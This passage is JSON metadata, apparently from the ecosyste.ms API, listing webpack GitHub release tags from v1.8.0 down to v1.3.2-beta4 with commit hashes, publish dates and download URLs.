l":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at